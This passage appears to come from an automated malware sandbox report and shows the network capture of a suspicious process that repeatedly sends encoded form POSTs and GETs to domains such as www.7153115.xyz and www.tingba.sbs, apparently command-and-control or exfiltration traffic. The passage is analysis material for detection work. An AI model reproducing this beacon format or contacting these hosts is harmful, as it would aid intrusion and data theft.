                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1406&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 35 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b b1 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 2f 35 2d b7 d4 57 28 4f 2c 56 c8 cb 2f 51 48 03 29 55 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 fa b4 bc 15 48 00 00 00 0d 0a
                                                        Data Ascii: 5a0/Qp/K0HU(J-,M-.IMQQ/5-W(O,V/QH)US(,V(N-*K-H
                                                        Nov 7, 2024 15:51:42.024770975 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.1049993188.114.96.3806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:43.292861938 CET512OUTGET /u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.lnnn.fun
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:51:44.726872921 CET973INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:44 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNQc3uvc2%2FuAsP6zaVcAr%2BhmRhWuSGj1ticct0jl4%2Ft65mYmZ1B9MOZ4%2Fnrng2Q1EwIn%2FliL1UlbwyyrrKU6EczUt1iTBieaxAHkSAGQRblKZ8h%2F06yvTc7ztUeXKF0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee249f0ee56c31-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=512&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 64 39 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 35 77 39 2f 3f 65 4c 2d 78 3d 41 33 4c 75 74 4f 70 4b 63 41 65 50 65 6c 69 62 4a 6b 58 44 44 59 46 44 4f 2b 41 2f 55 37 6b 58 38 51 77 38 41 49 35 46 38 32 4b 4f 43 72 59 61 42 75 77 2b 78 37 42 44 39 7a 6d 6b 35 6c 56 55 6b 45 63 66 42 4b 56 32 47 49 63 6c 44 76 6f 55 2b 56 39 43 71 30 6d 53 6c 62 34 53 74 70 49 33 39 58 57 59 77 43 2b 6f 77 49 2b 34 65 72 5a 6d 79 77 3d 3d 26 23 78 32 36 3b 77 46 56 48 3d 2d 7a 77 54 4b 50 46 30 69 50 74 68 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: d9<h1>Not Found</h1>The requested URL /u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&#x26;wFVH=-zwTKPF0iPth was not found on this server.0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.1049994103.249.106.91806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:49.847692013 CET767OUTPOST /dblf/ HTTP/1.1
                                                        Host: www.7153115.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.7153115.xyz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.7153115.xyz/dblf/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 38 43 51 47 36 44 4a 6f 4e 79 39 33 4d 2b 51 72 46 76 49 47 62 64 42 68 54 34 6a 7a 52 74 77 35 56 59 53 4d 6a 35 2f 75 31 51 53 65 39 49 50 33 46 30 47 2f 42 53 7a 34 47 48 79 4a 38 33 2f 62 6d 41 48 76 64 6d 6e 72 48 73 57 75 45 69 62 6f 61 66 55 30 4c 31 2f 50 59 4d 52 43 61 71 6c 44 50 41 43 55 62 36 59 78 69 68 65 61 6e 47 31 6d 6a 70 30 55 57 47 64 35 6d 35 46 6b 51 35 76 64 33 4e 6c 32 79 4c 6c 51 42 38 53 70 79 71 4d 57 2b 61 4d 56 42 69 64 41 61 74 4f 45 72 78 78 7a 47 4f 72 68 63 41 6b 4c 4c 44 44 74 2f 7a 6b 4c 41 2b 6a 36 48 4b 37 77 61 42 31 4c
                                                        Data Ascii: eL-x=8CQG6DJoNy93M+QrFvIGbdBhT4jzRtw5VYSMj5/u1QSe9IP3F0G/BSz4GHyJ83/bmAHvdmnrHsWuEiboafU0L1/PYMRCaqlDPACUb6YxiheanG1mjp0UWGd5m5FkQ5vd3Nl2yLlQB8SpyqMW+aMVBidAatOErxxzGOrhcAkLLDDt/zkLA+j6HK7waB1L
                                                        Nov 7, 2024 15:51:50.856875896 CET190INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:50 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: d404 Not Found0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.1049995103.249.106.91806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:52.392051935 CET791OUTPOST /dblf/ HTTP/1.1
                                                        Host: www.7153115.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.7153115.xyz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.7153115.xyz/dblf/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 38 43 51 47 36 44 4a 6f 4e 79 39 33 4f 61 73 72 48 4d 67 47 4b 4e 42 69 66 59 6a 7a 66 4e 77 44 56 59 65 4d 6a 34 37 45 31 6c 36 65 38 74 4c 33 45 32 75 2f 43 53 7a 34 56 48 7a 42 79 58 2b 32 6d 41 44 6e 64 6b 6a 72 48 74 32 75 45 6e 2f 6f 62 73 73 33 5a 31 2f 4e 51 73 52 41 56 4b 6c 44 50 41 43 55 62 36 4d 58 69 69 75 61 6b 31 74 6d 73 72 4d 58 62 6d 64 36 68 35 46 6b 55 35 76 42 33 4e 6c 55 79 4b 34 33 42 35 65 70 79 72 38 57 2f 4c 4d 61 4c 69 63 4c 58 4e 50 55 72 6a 64 6a 41 4d 43 62 64 57 67 55 62 6a 48 2f 34 53 5a 4d 52 76 43 74 55 39 6e 2b 55 48 41 68 79 51 68 33 2f 47 39 56 4b 51 37 78 73 49 4f 34 53 35 73 73 7a 51 3d 3d
                                                        Data Ascii: eL-x=8CQG6DJoNy93OasrHMgGKNBifYjzfNwDVYeMj47E1l6e8tL3E2u/CSz4VHzByX+2mADndkjrHt2uEn/obss3Z1/NQsRAVKlDPACUb6MXiiuak1tmsrMXbmd6h5FkU5vB3NlUyK43B5epyr8W/LMaLicLXNPUrjdjAMCbdWgUbjH/4SZMRvCtU9n+UHAhyQh3/G9VKQ7xsIO4S5sszQ==
                                                        Nov 7, 2024 15:51:53.904449940 CET190INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:53 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: d404 Not Found0
                                                        Nov 7, 2024 15:51:53.905735970 CET190INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:53 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: d404 Not Found0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.1049996103.249.106.91806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:54.946218967 CET1804OUTPOST /dblf/ HTTP/1.1
                                                        Host: www.7153115.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.7153115.xyz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.7153115.xyz/dblf/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 38 43 51 47 36 44 4a 6f 4e 79 39 33 4f 61 73 72 48 4d 67 47 4b 4e 42 69 66 59 6a 7a 66 4e 77 44 56 59 65 4d 6a 34 37 45 31 6a 69 65 38 66 44 33 4c 33 75 2f 44 53 7a 34 4f 6e 7a 41 79 58 2f 30 6d 41 37 6a 64 6b 76 64 48 70 47 75 45 45 48 6f 53 39 73 33 44 6c 2f 4e 50 38 52 42 61 71 6b 5a 50 41 53 51 62 36 63 58 69 69 75 61 6b 30 64 6d 6c 5a 30 58 5a 6d 64 35 6d 35 46 53 51 35 76 39 33 4e 73 72 79 4b 38 4e 43 4b 57 70 79 4c 73 57 35 39 67 61 48 69 63 4a 53 4e 4f 52 72 6a 51 6b 41 4d 66 69 64 57 38 74 62 68 6e 2f 38 7a 34 73 45 4f 53 6b 41 66 76 68 4b 30 67 72 34 48 56 48 79 69 34 49 62 52 37 70 2f 59 48 4d 61 72 41 6e 74 61 33 4c 64 48 66 66 63 66 34 53 62 63 4f 54 79 51 65 50 4c 62 69 2f 61 64 35 67 79 6f 78 47 73 43 42 62 39 67 4f 66 57 33 4a 71 4c 61 6f 67 32 69 67 35 58 6a 75 32 68 55 66 41 67 33 46 73 64 6d 49 51 78 62 63 65 46 78 48 6b 6b 78 57 49 75 55 36 30 55 4a 39 4c 2f 59 6e 4b 65 4f 63 39 36 58 54 77 49 57 72 42 75 57 46 63 58 47 52 78 53 34 48 7a 76 6c 5a 6f 62 6d 4a 49 32 [TRUNCATED]
                                                        Data Ascii: eL-x=8CQG6DJoNy93OasrHMgGKNBifYjzfNwDVYeMj47E1jie8fD3L3u/DSz4OnzAyX/0mA7jdkvdHpGuEEHoS9s3Dl/NP8RBaqkZPASQb6cXiiuak0dmlZ0XZmd5m5FSQ5v93NsryK8NCKWpyLsW59gaHicJSNORrjQkAMfidW8tbhn/8z4sEOSkAfvhK0gr4HVHyi4IbR7p/YHMarAnta3LdHffcf4SbcOTyQePLbi/ad5gyoxGsCBb9gOfW3JqLaog2ig5Xju2hUfAg3FsdmIQxbceFxHkkxWIuU60UJ9L/YnKeOc96XTwIWrBuWFcXGRxS4HzvlZobmJI25JGm1PKOz10jsxBi1YhXSjuBJLjF/j35EAneErJctfIukuuZz+b6WsAs/ZUehZrOiT85I21ZbQGxknkX5odeu4kE9lO+yxuwJ18BYK+ilkIn8e1DTQTOZ4p1sIdJzaZySLFO7jcFKsBktY33hRzZGDXStAz4vO+iH8oKVPtOMIK1Tch0OkY4wbv+xNlvgsKC73i+A6iIUPVrG2jDWTmd19YJAQ/yGCV2izzmyEdWqjFR9z2exucMrCs+oC/rJN8dNW6b2xt4g8zgnCteOxGV5i0dEcW1TfozP3my89LPO6CUP1LiHxKMdz1z5b0jfXxfNJYbp6AJ6XxlH4As173csX1BmfIZjAvoPjz2q3svUaumOA2eITorlaPboAP+FayCeK9auJyMoDQrlf8IQ6DItQ9nj2sAkgD+n4d5lVVpbMo+RH+i6X1en1+6KyLjURzRGklLb1oJTIPPV5v6/F0sxVLcV9fDKEo+cb6itzekMMrxJkY5A0o5v/3o36Akq8yj3VVvLBe5y5kIb4qzLmrAaSPW+c+sf/K/d1xikPqnQqxZjNgFsdoZyYb4ebqavTozGfL4sPCCxpXUGdQ2w5B0k+c39+RC5HReiS9Wu7zNWN3wBWcgBzmFX0sttjlWQMR6MR02BWALGoe7dIZXzHKnRyVaQU9yB5ywPd [TRUNCATED]
                                                        Nov 7, 2024 15:51:55.929886103 CET190INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:55 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: d404 Not Found0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.1049997103.249.106.91806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:57.480072021 CET515OUTGET /dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.7153115.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:51:58.468180895 CET528INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:58 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Data Raw: 31 34 38 0d 0a 3c 62 72 3e 0d 0a 3c 62 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 22 3e e5 8a a0 e8 bd bd e4 b8 ad ef bc 8c e8 af b7 e7 a8 8d e5 90 8e 2e 2e 2e 2e 2e 2e 3c 2f 70 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 2c 63 6b 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 66 79 65 72 2e 63 6f 6d 3f 69 64 3d 38 34 35 36 32 22 20 2f 3e 0d 0a 30 0d 0a [TRUNCATED]
                                                        Data Ascii: 148<br><br><center><p style="font-size: 20px;">......</p></center><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"JXOyCm8odVXxhB2w",ck:"JXOyCm8odVXxhB2w"})</script><meta http-equiv="refresh" content="1;url=https://www.bfyer.com?id=84562" />0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.1049998172.67.202.10806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:52:03.737556934 CET764OUTPOST /njro/ HTTP/1.1
                                                        Host: www.tingba.sbs
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.tingba.sbs
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.tingba.sbs/njro/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 31 6b 65 39 55 61 44 35 4a 33 32 49 33 65 76 4a 71 56 41 4e 6f 76 44 35 61 36 70 44 59 56 45 68 2b 6e 76 6b 56 33 7a 6e 2b 55 2f 2f 56 47 33 47 50 56 34 50 74 6e 4c 58 4b 41 38 6f 66 31 58 39 32 4c 74 61 78 57 77 2f 71 7a 42 36 77 69 49 46 32 4d 68 33 46 6c 58 64 62 43 51 4c 30 2f 77 58 63 4c 71 45 66 49 55 66 41 71 31 39 2b 78 37 45 57 44 39 2b 71 71 2f 33 35 63 4e 65 74 4d 62 58 47 4a 69 69 43 51 4b 6a 49 31 39 48 32 65 31 53 48 74 6d 56 49 4d 79 78 37 67 51 66 2f 49 42 55 31 30 4a 41 71 68 78 56 43 57 6c 33 67 4e 56 57 64 70 6e 41 70 34 5a 70 78 34 2f 47
                                                        Data Ascii: eL-x=1ke9UaD5J32I3evJqVANovD5a6pDYVEh+nvkV3zn+U//VG3GPV4PtnLXKA8of1X92LtaxWw/qzB6wiIF2Mh3FlXdbCQL0/wXcLqEfIUfAq19+x7EWD9+qq/35cNetMbXGJiiCQKjI19H2e1SHtmVIMyx7gQf/IBU10JAqhxVCWl3gNVWdpnAp4Zpx4/G
                                                        Nov 7, 2024 15:52:04.770688057 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:52:04 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2bwu3RGVfgpHLxGPoBFZXm%2FIGgrTB2UMcvWP2SJhqdPKKiiIS138vuBZ%2FCQwVCU%2BfU1v0hditPSuJ9iEk4sOB%2BcMAZDS3pGhPgvTphh6RAIb0OoWzViv5rppS2Ao9Ez6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee251ead6e2cbe-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=764&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 61 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 54 c9 8e eb 48 76 dd 37 d0 ff 90 ce 86 51 0d 4b 99 9c 45 4a f9 5e 01 a4 38 68 16 25 51 12 a5 1d 87 20 19 22 19 24 83 c1 31 91 9f e0 7d a3 61 2f ec 85 e1 8d 97 36 ec ff e9 5e d4 5f 18 ca cc 57 55 0f dd b0 17 de 3a 36 c1 3b 9f 7b ee 0d 7e f9 1b 75 3b b5 2e a6 f6 10 91 34 f9 f1 b7 bf f9 72 bf 1f da 34 41 e5 d7 c7 88 90 7c 42 51 4d d3 3c 37 dc 73 86 43 8a 19 8f c7 54 7b f7 79 fc f1 4b 04 1c ff 1e 42 20 49 c0 8f 3c cd 53 3f fd d3 bf ff f4 8f ff fc a7 ff fc fb 3f ff db 1f fe fc 0f ff fa 85 fa 30 fd f6 37 5f 52 40 9c 87 7b be 27 50 54 b0 fe fa 38 cd 10 01 88 3c 59 5d 0e 1e 1f bc 0f e9 eb 23 01 2d a1 ee f9 5f 1e bc c8 c1 25 20 5f 2b 12 3c 49 8f 7f 35 09 06 01 06 65 f4 4b fc 0f c2 cb 43 85 93 af d4 0f 77 ff 92 74 ef d5 dd cc ef 86 3e ac 87 7e 32 f4 c9 d0 f7 87 55 32 cc 92 61 02 87 11 33 8c d8 61 c4 0d 23 7e 18 09 c3 68 34 cc 31 18 7a 99 0f 86 41 86 d3 e1 1d 8f 83 81 33 2c 41 02 3c 32 cc 72 12 e2 ac ca ef 1f 30 43 c3 00 82 c4 2f 01 19 26 20 04 c8 1f e6 43 37 c9 [TRUNCATED]
                                                        Data Ascii: a44THv7QKEJ^8h%Q "$1}a/6^_WU:6;{~u;.4r4A|BQM<7sCT{yKB I<S??07_R@{'PT8<Y]#-_% _+<I5eKCwt>~2U2a3a#~h41zA3,A<2r0C/& C72$5up~(o?G4|u3<wDY<d<%7
                                                        Nov 7, 2024 15:52:04.770894051 CET1236INData Raw: fd 6f 4d 7c 64 0b 9c 14 26 dd 04 a2 08 60 48 5e 7e a9 f0 bd e6 1d d5 77 aa 06 c0 30 22 df 74 df 57 fe 28 f8 0b 05 7f f7 3d f0 97 04 22 f0 14 7d 24 60 9e d9 37 e7 01 a6 e1 3b 2b 4f 69 f9 04 11 01 38 cf 12 e7 8e f2 29 cd 7c 30 71 a1 57 b9 d0 7b bb
                                                        Data Ascii: oM|d&`H^~w0"tW(="}$`7;+Oi8)|0qW{u'uro^?t&QV<t&G`$+|F7z$qL}|>| b%;>,&{7>gyK1q,uN2|Ow^p
                                                        Nov 7, 2024 15:52:04.770906925 CET1236INData Raw: e8 6d c7 30 40 6c 84 82 9b 95 2c cb 24 a7 95 d0 2f 9c fa 36 ab 43 c6 59 8d 44 69 9b 45 f6 a1 8f 6e 03 2a 3f 41 cd 56 55 b6 64 97 dd a5 5b a2 1e d4 38 ee 2d ae 3a 53 7d e3 f6 0c 6f a3 fd d6 bf 10 59 96 15 79 b6 3f 58 89 49 fd ff f9 eb 47 fe 3f 50
                                                        Data Ascii: m0@l,$/6CYDiEn*?AVUd[8-:S}oYy?XIG?Pu9I/Jey0nR;n\}|x2r 5(.,}|tM}E{b/Yc]$s{s:E=5+>mwhz*Zfdfon!+]V$3aSr-gew9o
                                                        Nov 7, 2024 15:52:04.771615028 CET1236INData Raw: 0e b4 3b 78 0c d7 c4 ad b0 96 b6 6a 9c 68 b9 b2 19 5a ee f9 7d 58 35 37 6a fc ac d8 5a a2 db 57 50 e7 c6 4f 58 55 4e eb 33 64 20 4a 4d 22 0d f0 3c 1e 09 ac 28 76 71 16 7e 7e 9a 73 ab 73 0a f3 f1 d4 1b ba f7 4c b8 d0 b4 36 ca 9a 26 34 38 a1 ac 66
                                                        Data Ascii: ;xjhZ}X57jZWPOXUN3d JM"<(vq~~ssL6&48f~v7[hl?yG}E={^4+yjYs@jwI6q0.[Qd!gBR|0$jXRs2o"ioG[}S,l=0
                                                        Nov 7, 2024 15:52:04.771627903 CET1236INData Raw: 59 5d d5 30 d1 04 a2 46 95 b6 55 e8 09 e8 46 a1 3b 42 e0 02 8b 8e 2f cf 19 e9 30 08 e0 9d 8c 65 94 ed fa 1f 8c 44 88 26 0d 34 ed 73 65 73 b5 84 c2 7d 35 13 d1 cf 77 0f 4f 52 5d 41 3a e7 ee c2 85 76 e4 34 72 cd 7f ef c5 4c 11 63 c0 b9 39 72 ce d8
                                                        Data Ascii: Y]0FUF;B/0eD&4ses}5wOR]A:v4rLc9r^e#do/W<Tz?RWfvW,Q&L)n-ar^kEIx~j)"+W~7Igv)v8bN.I>.Lda
                                                        Nov 7, 2024 15:52:04.772386074 CET1236INData Raw: 7c 05 ae 87 e4 d0 2c ee 44 69 0a a3 dc 4d ae db 7e 05 eb f4 4c cf ae bb 8c 11 4d 84 fd 70 cf 35 a4 c3 3e ba 9f 2b 14 45 29 9c a6 8a d4 59 be 34 b6 6d c7 71 26 f0 6b 3d 2b 6f b3 7d 02 be 5c 93 03 c6 14 1a ef 8c 95 df 3f 92 ba 59 e6 65 4a 32 5f aa
                                                        Data Ascii: |,DiM~LMp5>+E)Y4mq&k=+o}\?YeJ2_BL4DQI5{;f)s+G'>5LyL58ftKoMQhPHJ(6%e>DR| &$<I]%(Wc{p^KG""#
                                                        Nov 7, 2024 15:52:04.772403002 CET357INData Raw: fe 1b 04 1e c6 7e 09 a8 0b cf 29 b3 6b a0 4d e6 ed 01 74 00 ef 8f 9b 9a 81 df bc d5 07 af b4 32 7d f0 4a d6 73 21 4d 38 58 1d 39 65 f9 e0 fe 35 6d df eb 70 dc a8 3e 88 dc 07 f7 dd 6c f5 ce 05 30 bf 70 de eb bf 16 38 5c 95 2c dd 83 2b e4 bf 8f df
                                                        Data Ascii: ~)kMt2}Js!M8X9e5mp>l0p8\,+2z+q;mA7%|{wxO|?}w^1?{'xNsa7e<^=>:GO?{;)


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.1049999172.67.202.10806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:52:06.283986092 CET788OUTPOST /njro/ HTTP/1.1
                                                        Host: www.tingba.sbs
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.tingba.sbs
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.tingba.sbs/njro/
